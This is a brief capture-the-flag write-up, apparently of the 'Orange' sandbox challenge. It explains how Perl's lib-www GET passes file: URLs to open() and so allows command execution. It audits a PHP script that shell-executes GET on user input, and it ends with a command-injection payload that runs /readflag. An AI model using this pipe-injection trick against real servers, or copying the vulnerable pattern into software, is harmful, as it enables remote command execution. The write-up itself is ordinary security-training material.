Article Directory
Knowledge points
Perl script GET open command vulnerability
GET is a command in Lib for WWW in Perl. The purpose is to simulate http GET requests. The bottom layer of the GET function calls open processing.
Open command execution exists, and also supports file function
Newly learned function
Code audit
The previous code returns my ip, which is md5 encrypted with orange. The content entered through the url parameter will be executed with a GET command, and
the result of the command execution will be stored in a file named after the value of the filename parameter
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
}
echo $_SERVER["REMOTE_ADDR"];
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);
@chdir($sandbox);
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
highlight_file(__FILE__);
Try to read the root directory and create a file named abc. I
see that readflag should be used to read the flag and construct the payload?url=file:bash -c /readflag|&filename=123
